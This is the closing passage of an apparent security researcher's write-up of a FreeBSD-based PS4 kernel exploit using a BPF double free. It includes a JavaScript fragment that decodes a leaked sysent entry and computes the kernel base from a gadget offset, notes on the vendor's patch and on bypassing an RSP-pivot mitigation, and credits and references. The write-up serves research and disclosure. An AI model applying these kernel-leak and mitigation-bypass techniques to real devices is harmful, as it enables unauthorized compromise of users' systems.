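  sy_systrace_args_func: dump[3],                   // offset 0x18
  sy_entry:              lo32(dump[4]),             // offset 0x20
  sy_return:             hi32(dump[4]),             // offset 0x24
  sy_flags:              lo32(dump[5]),             // offset 0x28
  sy_thrcnt:             hi32(dump[5]),             // offset 0x2c
};

// The gadget offset quoted in the text implies this kernel base for the dump.
const kernelBase = entry.sy_call - 0x13460n;

console.log(entry.sy_narg, entry.sy_flags, entry.sy_thrcnt, kernelBase.toString(16));
```

Read this way, the 1 in 100000000h sits in the upper dword of the last qword, and subtracting the gadget offset from sy_call gives a page-aligned value, which is a useful consistency check on the numbers quoted above.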

Sony Patch

Again, this is not a proper fix for the underlying bug, but a Sony-style patch - though this time a more effective one. Opening BPF has been blocked for unprivileged processes such as WebKit and other apps/games. The device is still present in the sandbox, however attempting to open it will fail and yield EPERM.

Conclusion

Another cool bug to exploit. It should have been a trivial exploit, however Sony’s new mitigation that prevents exploit devs from pivoting RSP into userland memory while in kernel context is quite effective, and some tricks had to be used to get the chain into kernel memory - but as demonstrated, it is beatable. This exploit is also a good example of how double free()’s can be exploited fairly easily on FreeBSD if they’re on an object of decent size.

Thanks

qwertyoruiopz

flatz

Additional Thanks

TheFloW - Suggestions and Feedback

References

qwertyoruiopz : Detailed Annotation

qwertyoruiopz : Zero2Ring0 Slides

Watson FreeBSD Kernel Cross Reference

Marco Ramilli : From ROP to JOP

Wikipedia : Control register (cr0)

Wikipedia : Critical section